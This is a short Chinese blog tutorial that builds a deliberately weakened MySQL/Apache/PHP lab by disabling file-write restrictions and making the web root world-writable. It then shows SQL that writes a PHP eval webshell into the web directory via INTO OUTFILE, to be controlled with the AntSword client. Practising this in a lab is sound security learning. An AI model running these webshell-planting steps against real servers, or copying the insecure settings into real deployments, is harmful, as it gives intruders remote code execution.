MySQL靶场&攻击

靶场搭建

修改配置文件

复制代码
vim /etc/my.cof

[mysqld]
secure_file_priv=
local-infile=1
[mysql]
local-infile=1

安装相关环境

复制代码
yum install php php-mysql -y

添加配置

复制代码
vim /etc/httpd/conf/httpd.conf

AddType application/x-httpd-php-source .phps
AddType application/x-httpd-php .php

重启相关服务

复制代码
systemctl restart httpd

修改权限

复制代码
chmod -R o+w /var/www

攻击

复制代码
use TEST;
show tables;
create table muma(cmd text);
insert into muma values(concat('<?php @eval($_POST[','''','mimi','''',']); ?>'));
select * from muma;
select * from muma into outfile '/var/www/html/ma.php';

访问 IP/ma.php

蚁剑连接

作 者:PeiyuJue

链 接: https://peiyu.serv00.net/2024/07/05/mysql靶场攻击/

来 源:Aaron的博客

版 权 声 明:本博客所有文章除特别声明外,均采用CC BY-NC-SA 4.0许可协议。文章版权归作者所有,未经允许请勿转载!

相关推荐
-SGlow-2 小时前
MySQL相关概念和易错知识点(2)(表结构的操作、数据类型、约束)
linux·运维·服务器·数据库·mysql
明月5663 小时前
Oracle 误删数据恢复
数据库·oracle
终焉暴龙王4 小时前
CTFHub web进阶 php Bypass disable_function通关攻略
开发语言·安全·web安全·php
水瓶_bxt5 小时前
Centos安装HAProxy搭建Mysql高可用集群负载均衡
mysql·centos·负载均衡
♡喜欢做梦5 小时前
【MySQL】深入浅出事务:保证数据一致性的核心武器
数据库·mysql
遇见你的雩风5 小时前
MySQL的认识与基本操作
数据库·mysql
dblens 数据库管理和开发工具5 小时前
MySQL新增字段DDL:锁表全解析、避坑指南与实战案例
数据库·mysql·dblens·dblens mysql·数据库连接管理
weixin_419658315 小时前
MySQL的基础操作
数据库·mysql
百川5 小时前
Apache文件解析漏洞
web安全·apache
不辉放弃6 小时前
ZooKeeper 是什么?
数据库·大数据开发